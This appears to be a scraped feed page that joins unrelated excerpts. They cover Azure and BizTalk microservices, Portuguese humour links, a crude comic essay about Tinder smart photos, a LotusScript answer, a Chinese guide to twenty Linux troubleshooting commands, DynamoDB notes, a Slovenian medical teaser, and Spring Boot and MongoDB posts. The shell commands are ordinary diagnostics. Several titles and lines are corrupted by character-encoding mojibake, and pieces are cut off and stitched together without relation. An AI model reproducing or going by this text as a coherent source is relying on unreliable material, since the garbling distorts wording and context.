          I see a convergence between cloud based integration, Internet of Things (IoT), Big Data and Predictive analytics.  Microsoft has some tremendous opportunities in this space as they have very competent offerings in each of these areas. If Microsoft can find a way to ‘stitch’ them all together they were will be some amazing solutions developed.

          Picture Source @wearsy

          Below is a Power BI screen that displays SalesForce Opportunities by Lead Source.

          Picture Source @wearsy

          Marketplace - Microservice Gallery

          Buckle your seatbelts for this one!

          Azure already has a market place appropriately called Azure Marketplace. In this Marketplace you can leverage 3rd party offerings including:

          • Data services
          • Machine Learning
          • Virtual Machines
          • Web applications
          • Azure Active Directory applications
          • Application services

          You can also expect a Microservice Gallery to be added to this list.  This will allow 3rd parties to develop Microservices and add them to the Marketplace.  These Microservices can be monetized in order to develop a healthy eco-system.  At the beginning of this blog post you saw a list of Microsoft partners who are active in the existing Integration eco-system.  Going forward you can expect these partners + other Azure partners and independent developers building Microservices and publishing them to to this Marketplace.

          In the past there has been some criticism about BizTalk being too .Net specific and not supporting other languages.  Well guess what? Microservices can be built using other languages that are already supported in Azure including:

          • Java
          • Node.js
          • PHP
          • Python
          • Ruby

          This means that if you wanted to build a Microservice that talks to SaaS application ‘XYZ” that you could build it in one of this languages and then publish it to the Azure Marketplace.  This is groundbreaking.

          The image below describes how a developer would go ahead and publish their Microservice to the gallery through a wizard based experience.Embedded image permalink

          Picture Source @wearsy

          Another aspect of the gallery is the introduction of templates.  Templates are another artifact that 3rd parties can publish and contribute.  Knowing the very large Microsoft ISV community with a lot of domain expertise this has the potential to be very big.

          Some of the examples that were discussed include:

          • Dropbox – Office365
          • SurveyMonkey – SalesForce
          • Twitter – SalesForce

          With a vast amount of Connector Microservices, the opportunities are endless.  I know a lot of the ISVs in the audience were very excited to hear this news and were discussing what templates they are going to build first.

          Embedded image permalink

          Picture Source @nickhauenstein

          What about BizTalk Server?

          Without question, a lot of attendees are still focused on On-Premises integration. This in part due to some of the conservative domains that these people support. Some people were concerned about their existing investments in BizTalk Server.  Microsoft confirmed (again) their commitment to these customers.  You will not be left behind!  On the flipside, I don’t think you can expect a lot of innovation in the traditional On-Premises product but you will be supported and new versions will be released including BizTalk Server 2015.

          You can also expect every BizTalk Server capability to be made available as a Microservice in Azure. Microsoft has also committed to providing a great artifact migration experience that allows customers to transition into this new style of architecture.

          Embedded image permalink

          Picture Source @wearsy

          Conclusion

          If there is one thing that I would like you to take away from this post it is the “power of the Azure platform”.  This is not the BizTalk team working in isolation to develop the next generation platform.  This is the BizTalk team working in concert with the larger Azure App Platform team.  It isn’t only the BizTalk team participating but other teams like the API Management team, Mobile Services team, Data team and  many more I am sure.

          In my opinion, the BizTalk team being part of this broader team and working side by side with them, reporting up the same organization chart is what will make this possible and wildly successful.

          Another encouraging theme that I witnessed was the need for a lighter weight platform without compromising Enterprise requirements.  When you look at some of the other platforms that allow you to build interfaces in a web browser, this is what they are often criticized for.  With Microsoft having such a rich history in Integration, they understand these use cases as well as anyone in the industry. 

          Overall, I am extremely encouraged with what I saw.  I love the vision and the strategy.  Execution will become the next big challenge. Since there is a very large Azure App Platform team providing a lot of the foundational platform, I do think the BizTalk team has the bandwidth, talent and vision to bring the Integration specific Microservices to this amazing Azure Platform.

          In terms of next steps, we can expect a public preview of Microservices (including BizTalk) in Q1 of 2015.  Notice how I didn’t say a BizTalk Microservices public preview?  This is not just about BizTalk, this about a new Microservice platform that includes BizTalk.  As soon as more information is publicly available, you can expect to see updates on this blog.


                    Links marmotosos pro fim de semana        


          Fotonovela ODB #2 do ORKUT DE BÊBADO

          Novela Cama de Gato: Elenco, Abertura e Curiosidades do PUTSGRILO

          Dez coisas que não se deve fazer num banheiro masculino do ELA TÁ DE XICO

          Novo Mascote das olimpíadas Rio 2016 do SUPER PÉROLAS

          Cinco Fatos incontestáveis sobre Europeus do ESTRANHOS EUROPEUS

          Jeremias muito louco é fichinha perto desse entrevistado do COPIA MEU FILHO
                    InnoDB实现独立表空间多数据文件 (InnoDB multiple datafiles per single-tablespace)        
          本文内容遵从CC版权协议, 可以随意转载, 但必须以超链接形式标明文章原始出处和作者信息及版权声明网址: ht […]
                    How I Used Tinder Smart Photos to Prove Once and for All That I’m More Attractive Than a Plate of Cold Refried Beans        

          Tinder now has a feature called “smart photos” that uses an algorithm to determine which of your photos is most successful and then automatically shows that photo to potential matches. 2017 has been a rough year for me — I hit the wrong side of 25, I got dumped, and I lost my job. I didn’t think I’d be able to turn this year around, but then I realized something. Maybe I could get some of my confidence back if only I knew once and for all — am I more attractive than a plate of cold refried beans? It was so simple — and Tinder smart photos could help me answer this question.

          To conduct this experiment, I needed a set of test data. Tinder smart photos will look through all your photos and chose the best one. You’ll know which one it’s chosen because that’ll be the first photo you see when you log in. All I wanted to know was that if I chose my five best photos, are all of those photos more successful than a plate of cold refried beans?

          If I made just one Tinder account with five pictures of me and one plate of cold refried beans, the best one might be a picture of me followed by the cold plate of refried beans followed by four more pictures of me. If this happened, I’d only find out which picture was the best, not the full ranking of pictures. Therefore, to conclude definitively that I’m more attractive than a plate of cold refried beans, I needed to make five separate Tinder accounts. On each account, I’d upload two photos: one of me, and one of a plate of cold refried beans. Of course, for consistency, I used the same picture of a plate of cold refried beans every time. How’d I get this picture, you might ask? I fried beans. Then I fried them again. Then I left them out overnight. Because I’m a goddamn scientist.

          My test pictures were the following:

          • Me from a very high angle to accentuate my best feature, namely my knowledge of which photo angle makes me look skinny.
          • Me doing stand-up comedy to demonstrate my wit and charm but actually just my wit.
          • Me and my sister to show how family-oriented I am and also to trick people into thinking I’m 21.
          • Me in a Safeway parking lot to demonstrate my love for the great outdoors.
          • Me in a bikini because as my mother used to say: “If you don’t have a bikini pic on Tinder, you’re probably less sexy than a plate of cold refried beans.”
          • A plate of cold refried beans.

          I was now ready to begin Tinder-ing. I wanted to make sure the experiment had its time to collect adequate data, so I left each account open for a day, logged which picture won, deleted the Tinder account, and then made a new one. For keeping track of data of this magnitude, I’d recommend an SQL server, a Mongodb database, an excel spreadsheet, or also you could write the results in eyeliner on your inner thigh. I chose the eyeliner route because I wanted to be able to iterate quickly, but please offer feedback if you think I could improve upon the data collection portion of the experiment.

          After the first four days of my experiment, the score was GINNY: 4, PLATE OF COLD REFRIED BEANS: 0. Things were looking good for this girl. I just had to get through one more photo — the dreaded bikini pic. I don’t have an especially great swimsuit bod, perhaps owing to my affinity for eating cold refried beans for dinner. I braced myself for a challenging day ahead as I made a new Tinder account that was just my body and the beans. Around 9pm, I was still too scared to look at the results. Could my self-esteem handle the knowledge that men would rather fuck a fart-inducing shit-like substance than my naked body? I was about to find out. At midnight, I was ready to get the final results. I held my breath as the app loaded. What would it be?! It stalled — damn my slow wifi. And then I saw it — IT WAS MY BIKINI PIC!! I AM MORE BEAUTIFUL THAN A PLATE OF COLD REFRIED BEANS!! WHAT A TIME TO BE ALIVE!!

          I’ve obviously been on Cloud 9 since the conclusion of this experiment. If I were to extend my analysis, I’d want to know if I were sexier than other plates of cold food, such as plates of cold spaghetti or plates of cold broccoli. I’d also want to see how I compared with stuff like grass and pavement. Perhaps one day I might even wonder if I’m more attractive to men now than I was when I was 11. But for now, I’m just happy knowing I’m more attractive than a plate of cold refried beans.


                    Acceder con @getprofilefield desde una base de datos a otra que contiene el documento de perfil        

          Acceder con @getprofilefield desde una base de datos a otra que contiene el documento de perfil

          Respuesta a Acceder con @getprofilefield desde una base de datos a otra que contiene el documento de perfil

          No es posible desde @formula pero si desde LotusScript.

          En el QueryOpen del formulario:

          Set oSession = new NotesSession
          Set oDb = oSession.getDatabase(.......)
          Set oProfile = oDb.getProfileDocument(......)

          Call Source.FieldSetText( ..... , oProfile.getItemValue(.....)(0) )


          Algo asi

          Publicado el 07 de Abril del 2016 por ElLobo

                    Comment on Why MongoDB Will Crush in 2015 by MongoDB Welcomes New CMO - Diamond        
          […] two MongoDB updates in that time: 2.8 and 3.0. I wrote an article back in January entitled Why MongoDB Will Crush in 2015, describing the recent shifts happening as far as leadership at MongoDB, and the recent funding […]
                    ç³»ç»Ÿç®¡ç†å‘˜åº”该知道的 20 条 Linux 命令        

          在这个全新的工具和多样化的开发环境井喷的大环境下,任何开发者和工程师都有必要学习一些基本的系统管理命令。特定的命令和工具包可帮助开发者组织、排查故障并优化他们的应用程序,而且当出现错误时,也可以为运维人员和系统管理员提供有价值的分类信息。

          无论你是新手开发者还是希望管理自己的应用程序,下面 20 条基本的系统管理命令都可以帮助您更好地了解您的应用程序。它们还可以帮助解决为什么应用程序可在本地正常工作但不能在远程主机上工作这类的系统故障。这些命令适用于 Linux 开发环境、容器和虚拟机。

          1. curl

          curl 用于传输一个 URL。可以使用这条命令用于测试应用程序的端点或与上游服务端点的连接。curl 还可用于检查你的应用程序是否能连接到其他服务,例如数据库,或检查您的服务是否处于健康的状态。

          举个例子,假如你的应用程序抛出一个 HTTP 500 错误,表示无法访问 MongoDB 数据库:

          $ curl -I -s myapplication:5000
          
          HTTP/1.0 500 INTERNAL SERVER ERROR

          -I é€‰é¡¹ç”¨äºŽæ˜¾ç¤ºå¤´ä¿¡æ¯ï¼Œ -s  选项表示使用静默模式,不显示错误和进度。检查数据库的端点是否正确:

          $ curl -I -s database:27017
          
          HTTP/1.0 200 OK

          那么可能是什么问题呢? 检查您的应用程序是否可以访问数据库以外的其他位置:

          $ curl -I -s https://opensource.com
          
          HTTP/1.1 200 OK

          看起来这没问题,现在尝试访问数据库。您的应用程序正在使用数据库的主机名,因此请先尝试:

          $ curl database:27017
          
          curl: (6) Couldn't resolve host 'database'

          这表示您的应用程序无法解析数据库,因为数据库的 URL 不可用或主机(容器或VM)没有可用于解析主机名的域名服务器。

          2. python -m json.tool / jq

          使用 curl 后,API 调用的输出可读性可能较差。有时候,你希望将生成的 JSON 数据格式化输出以查找特定的条目。Python 有一个内置的库可帮助您实现这个需求。可以使用 python -m json.tool  来缩进和组织 JSON。要使用 Python 的 JSON 模块,需要使用管道机制,将 JSON 文件的输出作为输入,写入到 python -m json.tool 命令行。

          $ cat test.json
          {"title":"Person","type":"object","properties":{"firstName":{"type":"string"},"lastName":{"type":"string"},"age":{"description":"Age in years","type":"integer","minimum":0}},"required":["firstName","lastName"]}

          要使用 Python 库,使用 -m (module) 选项将输出内容和 Python 库组合成管道。

          $ cat test.json | python -m json.tool
          {
              "properties": {
                  "age": {
                      "description": "Age in years",
                      "minimum": 0,
                      "type": "integer"
                  },
                  "firstName": {
                      "type": "string"
                  },
                  "lastName": {
                      "type": "string"
                  }
              },
              "required": [
                  "firstName",
                  "lastName"
              ],
              "title": "Person",
              "type": "object"
          }

          对于更高级的 JSON 解析,可以安装 jq 。j 提供了一些从 JSON 输入中提取特定值的选项。要像上面的 Python 模块一样将 JSON 输出格式化,只需将 jq 应用到输出即可。

          $ cat test.json | jq
          {
            "title": "Person",
            "type": "object",
            "properties": {
              "firstName": {
                "type": "string"
              },
              "lastName": {
                "type": "string"
              },
              "age": {
                "description": "Age in years",
                "type": "integer",
                "minimum": 0
              }
            },
            "required": [
              "firstName",
              "lastName"
            ]
          }

          3. ls

          ls ç”¨äºŽåˆ—出目录中的文件,系统管理员和开发者会经常使用这个命令。在容器空间中,这条命令可以帮助确定容器镜像中的目录和文件。除了查找文件, ls  还可以用于检查权限。下面的示例中,由于权限问题,你不能运行 myapp。当你使用  ls -l  检查权限时,你会发现它的权限在 -rw-r--r-- 中没有"x",只有读写的权限。

          $ ./myapp
          bash: ./myapp: Permission denied
          $ ls -l myapp
          -rw-r--r--. 1 root root 33 Jul 21 18:36 myapp

          4. tail

          tail æ˜¾ç¤ºæ–‡ä»¶çš„最后一部分内容。通常情况下,你不需要浏览每行日志以进行故障排除。而是需要检查日志中对应用程序的最新请求的说明。例如,当你向 Apache HTTP 服务器发起请求时,可以使用 tail 来检查日志中发生的情况。

          使用  tail -f  来跟踪日志文件并在发起请求时查看它们。

          -f选项表示跟随的意思,它可在日志被写入文件时输出它们。下面的示例具有每隔几秒访问端点的后台脚本,日志会记录请求。除了实时跟踪日志,还可以使用 tail 带上 -n  选项来查看文件的最后 100 行。

          $ tail -n 100 /var/log/httpd/access_log

          5. cat

          cat主要用于查看文件内容和合并文件。你可能会使用  cat  来检查依赖项文件的内容,或确认已在本地构建的应用程序的版本。

          $ cat requirements.txt
          flask
          flask_pymongo

          上面的示例检查您的 Python Flask 应用程序是否已将 Flask 列为依赖项。

          6. grep

          grep èƒ½ä½¿ç”¨ç‰¹å®šæ¨¡å¼åŒ¹é…ï¼ˆåŒ…括正则表达式)搜索文本。如果你在另一条命令的输出中寻找特定的模式, grep  会高亮显示相关的行。可使用这条命令来搜索日志文件以及特定的进程等。如果想查看 Apache Tomcat 是否启动,你可能会命令行的数量给淹没。但讲输出的内容和  grep 命令组合成管道,可以将表示服务器已启动的行独立出来。

          $ cat tomcat.log | grep org.apache.catalina.startup.Catalina.start
          01-Jul-2017 18:03:47.542 INFO [main] org.apache.catalina.startup.Catalina.start Server startup in 681 ms

          7. ps

          ps ç”¨äºŽæŸ¥çœ‹è¿›ç¨‹çš„各种状态信息。使用该命令可确定正在运行的应用程序或确认预期的进程。例如,如果要检查正在运行的 Tomcat Web 服务器,可使用带有选项的  ps  来获取 Tomcat 的进程 ID。

          $ ps -ef
          UID        PID  PPID  C STIME TTY          TIME CMD
          root         1     0  2 18:55 ?        00:00:02 /docker-java-home/jre/bi
          root        59     0  0 18:55 pts/0    00:00:00 /bin/sh
          root        75    59  0 18:57 pts/0    00:00:00 ps -ef

          为了更好的易读性,可使用 grep  和 ps  组合成管道。

          $ ps -ef | grep tomcat
          root         1     0  1 18:55 ?        00:00:02 /docker-java-home/jre/bi

          8. env

          env ç”¨äºŽåˆ—出所有环境变量及为其赋值。在故障排除期间,你可能会发现需要检查是否有错误的环境变量来阻止应用程序启动。在下面的示例中,该命令用于检查程序主机上设置的环境变量。

          $ env
          PYTHON_PIP_VERSION=9.0.1
          HOME=/root
          DB_NAME=test
          PATH=/usr/local/bin:/usr/local/sbin
          LANG=C.UTF-8
          PYTHON_VERSION=3.4.6
          PWD=/
          DB_URI=mongodb://database:27017/test

          请注意,该应用程序正在使用 Python 3,并具有连接到 MongoDB 数据库的环境变量。

          9. top

          top ç”¨äºŽæ˜¾ç¤ºç³»ç»Ÿä¸­å„个进程的信息和资源占用状况,类似于 Windows 的任务管理器。使用该命令可确定哪些进程正在运行,以及它们消耗了多少的内存和 CPU。一种常见的情况是当你运行一个应用程序时,它在一分钟后挂掉。这时,你首先检查应用程序的返回错误,发现是一个内存错误。

          $ tail myapp.log
          Traceback (most recent call last):
          MemoryError

          你的应用是否真的内存不足?要确认这个问题,可使用 top  来查看应用程序消耗多少 CPU 和内存。当使用  top  命令后,您注意到一个 Python 应用程序使用了大部分的 CPU,其内存使用量也迅速攀升。当它运行时,如果进程是你的应用程序,则按"C"键来查看完整命令并进行逆向工程。发现原来是你的内存密集型应用程序( memeater.py )。当你的应用程序已经用尽内存,系统会杀掉它并返回一个内存不足(OOM)的错误。

          应用程序的内存和 CPU 使用量增加,最终因为内存不足而被杀掉。

          通过按下"C"键,可以看到启动该应用程序的完整命令

          除了检查应用程序,还可以使用 top  来调试其他使用 CPU 或内存的进程。

          10. netstat

          netstat ç”¨äºŽæ˜¾ç¤ºç½‘络状态信息。该命令可显示正在使用的网络端口及其传入连接。但是, netstat  在 Linux 中不能开箱即用。如果需要安装它,需要在  net-tools   包中找到它。作为在本地进行试验或将应用程序推送到主机的开发者,可能会收到端口已被分配或地址已被使用的错误。使用 netstat 得到协议、进程和端口这些信息,下图表明 Apache HTTP 服务器已经在下面的主机上使用了 80 端口。

          使用 netstat -tulpn  表明 Apache 已经在这台机器上使用了 80 端口。

          11. ip address

          如果 ip address 在你的主机上不能使用,必须使用  iproute2   包进行安装。 i p address  用于显示应用程序的主机接口和 IP 地址。可使用 i p address  来验证你的容器或主机的 IP 地址。例如,当你的容器连接到两个网络时, i p address  可显示哪个接口连接到了哪个网络。对于简单的检查,可以随时使用  ip address  命令获取主机的 IP 地址。下面的示例展示了在接口 eth0 上的 Web 层容器的 IP 地址为 172.17.0.2

          使用 ip address  显示 eth0 接口的 IP 地址为 172.17.0.2

          12. lsof

          lsof用于列出当前系统打开的文件(list open files)。在某些 Linux 系统中,可能需要使用 lsof 包来安装 lsof 。在 Linux 中,几乎任何和系统的交互都被视为一个文件。因此,如果你的应用程序写入文件或代开网络连接, lsof  将会把这个交互映射为一个文件。与 netstat  类似,可使用 lsof  来检查侦听端口。例如,如果要检查 80 端口是否正在被使用,可使用  lsof  来检查哪个进程正在使用它。下面的示例中,可以看到 httpd (Apache) 在 80 端口上侦听。还可以使用  lsof  来检查 httpd 的进程ID,检查 Web 服务器的二进制文件所在位置( /usr/sbin/httpd )。

          Lsof è¡¨æ˜Žäº† httpd 在 80 端口上侦听。检查 httpd 的进程ID还可以显示所有需要运行的文件httpd。

          打开文件列表中的打开文件的名称有助于确定进程的来源,特别是 Apache。

          13. df

          可以使用 df 显示空闲的磁盘空间(display free disk space)以排查磁盘空间问题。挡在容器管理器上运行应用程序时,可能会收到一条错误信息,提示容器主机上缺少可用空间。虽然磁盘空间应该由系统管理程序来管理和优化,你仍可以使用 df  找出目录中的现有空间并确认是否没有空间。

          Df显示每个文件系统的磁盘空间、绝对空间以及其可用性。

          -h é€‰é¡¹è¡¨ç¤ºä»¥å¯è¯»æ€§è¾ƒé«˜çš„方式来显示信息,上面的例子表示这个主机具有大量的磁盘空间。

          14. du

          du命令也是用于查看使用空间的,但是与 df 命令不同的是 du 命令是对文件和目录磁盘使用的空间的查看,要获取有关哪些文件在目录中使用磁盘空间的更多详细信息,可以使用 du 命令,和 df 命令还是有一些区别的。例如,你想了解那个日志文件占用  /var/log  目录最多的空间,可以使用 du 命令加上 -h 选项和用于获取总大小的 -s  选项。

          $ du -sh /var/log/*
          1.8M  /var/log/anaconda
          384K  /var/log/audit
          4.0K  /var/log/boot.log
          0 /var/log/chrony
          4.0K  /var/log/cron
          4.0K  /var/log/maillog
          64K /var/log/messages

          上面的示例中显示了 /var/log 下的的最大目录为  /var/log/audit 。可以将 du 和 df 搭配使用,以确定在应用程序的主机上使用的磁盘空间。

          15. id

          要检查运行应用程序的用户,可使用 id  命令来返回用户身份。 id  命令可以显示真实有效的用户ID(UID)和组ID(GID)。下面的示例使用  Vagrant 来测试应用程序并隔离其开发环境。登录进 Vagrant 盒子后,如果尝试安装 Apache HTTP Server(依赖关系),系统会提示你需要以 root 身份执行该命令。要检查你的用户ID和组ID,使用 id  命令,会发现你正在"vagrant"组中以"vagrant"用户身份运行。

          $ yum -y install httpd
          Loaded plugins: fastestmirror
          You need to be root to perform this command.
          $ id
          uid=1000(vagrant) gid=1000(vagrant) groups=1000(vagrant) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

          要解决此问题,必须以超级用户的身份运行该命令,这将提供提升的权限。

          16. chmod

          c hmod 命令用来变更文件或目录的权限。当你在主机上首次运行应用程序的二进制文件时,可能会收到错误提示信息“拒绝访问”。如 ls  的示例所示,可以用于检查应用程序二进制文件的权限。

          $ ls -l
          total 4
          -rw-rw-r--. 1 vagrant vagrant 34 Jul 11 02:17 test.sh

          这表明您没有权限(没有“x”)来运行二进制文件。 c hmod  可以修改权限,使的用户能够运行二进制文件。

          $ chmod +x test.sh
          [vagrant@localhost ~]$ ls -l
          total 4
          -rwxrwxr-x. 1 vagrant vagrant 34 Jul 11 02:17 test.sh

          如例子所示,这将更新权限,使其具有可执行的权限。现在当你尝试执行二进制文件时,应用程序不会抛出拒绝访问的错误。当将二进制文件加载到容器时, Chmod 可能很有用。它能保证容器具有合适的权限以执行二进制文件。

          17. dig / nslookup

          dig å‘½ä»¤æ˜¯å¸¸ç”¨çš„域名查询工具,可以用来测试域名系统工作是否正常。域名服务器(DNS)有助于将 URL 解析为一组应用程序服务器。然而,你会发现有些 URL 不能被解析,这会导致应用程序的连接问题。例如,假如你尝试从应用程序的主机访问你的数据库。你收到一个"不能解析"的错误。要进行故障排查,你尝试使用  dig (DNS 查询工具)或 nslookup (查询 Internet 域名服务器)来确定应用程序似乎无法解析数据的原因。

          $ nslookup mydatabase
          Server:   10.0.2.3
          Address:  10.0.2.3#53
          
          ** server can't find mydatabase: NXDOMAIN

          使用 nslookup  显示无法解析  mydatabase 。尝试使用 dig  解决,但仍是相同的结果。

          $ dig mydatabase
          
          ; <<>> DiG 9.9.4-RedHat-9.9.4-50.el7_3.1 <<>> mydatabase
          ;; global options: +cmd
          ;; connection timed out; no servers could be reached

          这些错误可能是由许多不同的问题引起的。如果无法调试出根本原因,与系统管理员联系以进行更多的调查。对于本地测试,这些问题可能表示你的主机的域名服务器未正确配置。要使用这些命令,需要安装 BIND Utilities   包 。

          18. iptables

          iptables 用于阻止或允许 Linux 主机上的流量,用于 IP 包过滤器管理,类似于网络防火墙。此工具可阻止某些应用程序接收或发送请求。更具体地说,如果您的应用程序难以访问另一个端点,可能已被 iptables 拒绝流量访问该端点。例如,假设您的应用程序的主机无法访问 Opensource.com,您使用 curl  来测试连接。

          $ curl -vvv opensource.com
          * About to connect() to opensource.com port 80 (#0)
          *   Trying 54.204.39.132...
          * Connection timed out
          * Failed connect to opensource.com:80; Connection timed out
          * Closing connection 0
          curl: (7) Failed connect to opensource.com:80; Connection timed out

          连接超时。您怀疑某些东西可能会阻塞流量,因此您使用 -S  选项显示 iptables  规则。

          $ iptables -S
          -P INPUT DROP
          -P FORWARD DROP
          -P OUTPUT DROP
          -A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
          -A INPUT -i eth0 -p udp -m udp --sport 53 -j ACCEPT
          -A OUTPUT -p tcp -m tcp --sport 22 -j ACCEPT
          -A OUTPUT -o eth0 -p udp -m udp --dport 53 -j ACCEPT

          前三个规则显示,默认情况下流量已被丢弃。剩下的规则表示允许 SSH 和 DNS 流量。在这种情况下,如果需要允许流量到外部端点的规则,请跟上 sysadmin。如果这是用于本地开发或测试的主机,可使用 iptables 命令来允许合适的流量。添加允许到主机的流量的规则时一定要谨慎。

          19. sestatus

          通常会在企业管理的应用程序主机上使用 SELinux(一个 Linux 安全模块)。SELinux 对主机上运行的进程提供最低权限的访问,防止潜在的恶意进程访问系统上的重要文件。某些情况下,应用程序需要访问特定文件,但可能会发生错误。要检查 SELinux 是否阻止了应用程序,使用 tail  和  grep 在 /var/log/audit  日志记录中查找"denied"(被拒绝)的信息。否则,使用  sestatus  来检查是否启动了 SELinux。

          $ sestatus
          SELinux status:                 enabled
          SELinuxfs mount:                /sys/fs/selinux
          SELinux root directory:         /etc/selinux
          Loaded policy name:             targeted
          Current mode:                   enforcing
          Mode from config file:          enforcing
          Policy MLS status:              enabled
          Policy deny_unknown status:     allowed
          Max kernel policy version:      28

          上面的输出表示应用程序的主机已启用 SELinux。在本地开发环境中,可以更新 SELinux 使得权限更宽松。

          20. history

          当你使用大量的命令进行测试和调试时,可能会忘记有用的命令。每个 shell 都有一个 history  命令的变体。它可显示自会话开始以来使用的命令的历史记录。可以使用  history  来记录用来排除应用程序故障的命令。history 命令用于显示指定数目的指令命令,读取历史命令文件中的目录到历史命令缓冲区和将历史命令缓冲区中的目录写入命令文件。

          $ history
              1  clear
              2  df -h
              3  du

          如果希望执行之前历史记录中的命令,但又不想重新输入,该怎么办?使用符号 ! 即可,可以使用符号  ! 执行指定序号的历史命令。例如,要执行第 2 个历史命令,则输入!2,

          在需要重新执行的命令的指定编号前添加 ! 即可重新执行

          这些基本命令能增强排查故障的专业技能,可检查为什么应用程序可以在一个开发环境中工作,而在另一个开发环境中则不可以。许多系统管理员使用这些命令来调试系统问题。了解一些有用的故障排查命令可帮助解决应用程序的问题。

          来自: https://opensource.com

           


                    The Story of Dynochemy        
          As I wrote previously about “DynamoDB and Me”, I’ve been using Amazon’s hosted NoSQL datastore for some new projects including Lensmob.com. I like it, but it inevitably led me to writing a library for better higher-level usage: Dynochemy. The following is a story of the evolution of this library. How it started as a simple [...]
                    DynamoDB and Me        
          I first became interested Amazon’s hosted NoSQL datastore, DynamoDB, after reading about Datomic. It’s interesting to consider using this hardened underlying datastore for the simplest possible operations and putting higher-level (and perhaps more dangerous complexity) in the application layer. Also, I’m a big fan of async io and writing web applications in Tornado. This is [...]
                    PoÅ¡kodbe obraza in zob        

          Obraz je edini del telesa, ki je praktično vedno odkrit, poleg tega pa je zaradi svoje funkcije (vid, sluh, prebavila, dihala) vedno v središču dogajanja. Zato je razumljivo, da so poškodbe mehkih in trdih tkiv obraza in ustne votline pogost pojav. Pri oskrbi poškodb mehkih tkiv obraza in ustne votline, tj. kože, sluznic in globlje [...]

          The post Poškodbe obraza in zob appeared first on Zdravstvena.info.


                    åŸºäºŽSpring Boot技术栈的博客系统企业级实战发布        

          接到慕课网的通知,本人所设计的视频教程《基于Spring Boot技术栈的博客系统企业级实战》于 2017年7月31日中午发布了!课程地址:http://coding.imooc.com/class/125.html。 课程从策划、编码、录制到后期制作,差不多花费了4-5个月的时间。 课程中的每行代码都是笔者亲自敲的,光写代码都要个把个月时间。编码期间也是遇到了很多技术问题,埋了很多坑,其中心酸只有自知。

          课程简介

          通过实战课程的讲解,学员们可以围绕 Spring Boot 技术栈,以整合多个技术点,搭建一个能够用于快速开发的框架,一步一步构建博客系统的各个功能,实现一个完整前后端的企业级Java应用。

          Spring Boot技术是当前Java应用框架的热门。市面上对于Spring Boot的需求很旺盛,虽然有很多的技术资料来介绍Spring Boot这门技术,但缺乏实战。特别是在围绕Spring Boot技术栈来构建完整的企业级应用这个课程,讲师给出了自己的见解。本课程围绕整合以Spring Boot为核心的技术栈,来搭建并实现一个完整的企业级博客系统而展开。该博客系统支持市面上博客系统的常见功能。学员们可以通过学习构建这个博客系统的整个过程,来达到设计和实现一个企业级Java应用开发的目的。该博客系统是一个类似于 WordPress 的专注于博客功能的博客平台,支持多用户访问和使用。本博客系统所涉及的相关的技术有 Spring Boot、Spring、Spring MVC、Spring Security 、Spring Data、Hibernate、Gradle、Bootstrap、jQuery、HTML5、JavaScript、CSS、Thymeleaf、MySQL、H2、Elasticsearch、MongoDB 等。通过本课程的学习,不仅可以令学员了解企业级开发的完整流程,而且通过实战结合技术点的精讲和归纳,令读者知其然知其所以然。另外,本课程所涉及的技术,符合当前主流,并富有一定的前瞻性,可以有效提升学员在市场中的核心竞争力。

          本课程按照渐进式的讲解方式来授课。课程的前半部分为实战入门及进阶阶段,后半部分为实战高级阶段。

          本课程针对用户人群

          本课程主要面向的是Java开发者,以及对 Spring Boot 及企业级开发感兴趣的读者朋友。由于Spring Boot的核心技术还是Spring,所以学员在参与本课程的时候对于Spring技术有一定的理解。本课程涉及前端和后端以及数据存储、大数据处理等方面的知识,通过本课程的学习,有利于提升学员的知识的广度,并能掌握构建企业级应用的完整流程。

          课程的亮点与卖点是什么?

          虽然本课程所列举的案例是一个博客系统,但课程中所涉及的技术并不仅限于某个领域。可以广泛应用于传统IT行业、互联网行业的企业级应用。通过课程的学习,利于技术的提升。市面上缺乏同类型的课程,如果有,也缺少像本课程那样的注重实战,整合这么多种技术点,实现系统的架构,并应用于真实应用的能力。

          本课中讲解的技术点有哪些?

          本课程所涉及的相关的技术有 Spring Boot、Spring、Spring MVC、Spring Security 、Spring Data、Hibernate、Gradle、Bootstrap、jQuery、HTML5、JavaScript、CSS、Thymeleaf、MySQL、H2、Elasticsearch、MongoDB 等。据个人了解,Spring、Spring MVC、jQuery、HTML5、JavaScript、CSS、MySQL这些技术相对来说历史比较悠久学习介绍这些技术的资料也会较多。本课程的重点除了会侧重讲解市面比较少人介绍过的Spring Boot、Gradle、Bootstrap、Thymeleaf、H2、Elasticsearch、MongoDB等技术外,同时也会讲解如何来将这些所有技术做一个整合,搭建系统的框架,来构建一个完整的企业级应用。这不同于单讲某个技术点时,都是一些“Hello world”级别的小案例。

          本课程中选型的技术,都是市面上流行和热门的,富有前瞻性。

          课程安排及讲解方式

          重点是如何来围绕Spring Boot技术栈,通过整合这么多的技术,搭建一个能够用于快速开发的框架,最终实现一个完整的企业级应用。难点是技术点多,要完全掌握是有点难度的。所以本课程的安排是,前半部分先对一些市面上比较前瞻(或者说相关课程介绍比较少的)技术,做一个精讲,讲课的过程中辅以实战案例。后半部分,整合了所有的技术,搭建一个能够用于快速开发的框架,并来逐步构建博客系统的各个功能。案例是绝对高大上,功能是很专业的,技术点是很符合企业级开发应用的要求的。

          课程中的项目开发流程是怎么样的?

          • 知识点的技术归纳与实战
          • 分析功能需求,定义并API
          • 实现后台接口
          • 实现前端功能
          • 进行完整的测试。

          课程除了课程内容外,还有哪些增值服务?

          除了讲师答疑、代码全部开放外其他的增值福利,还有QQ群提供一对一的辅导。本课程相关的技术点都已经整理成相关的技术书籍,供学员免费参阅(见https://waylau.com/books/)。后期会有出版一本与本课程相关的Spring Boot书籍,届时,边看视频边看书,有利于知识点的梳理与巩固。


                    åŸºäºŽ MongoDB 及 Spring Boot 的文件服务器的实现        

          MongoDB 是一个介于关系数据库和非关系数据库之间的产品,是非关系数据库当中功能最丰富,最像关系数据库的,旨在为 WEB 应用提供可扩展的高性能数据存储解决方案。它支持的数据结构非常松散,是类似 JSON 的 BSON 格式,因此可以存储比较复杂的数据类型。

          本文将介绍通过 MongoDB 存储二进制文件,从而实现一个文件服务器 MongoDB File Server。

          文件服务器的需求

          本文件服务器致力于小型文件的存储,比如博客中图片、普通文档等。由于MongoDB 支持多种数据格式的存储,对于二进制的存储自然也是不话下,所以可以很方便的用于存储文件。由于 MongoDB 的 BSON 文档对于数据量大小的限制(每个文档不超过16M),所以本文件服务器主要针对的是小型文件的存储。对于大型文件的存储(比如超过16M),MongoDB 官方已经提供了成熟的产品 GridFS,读者朋友可以自行了解。

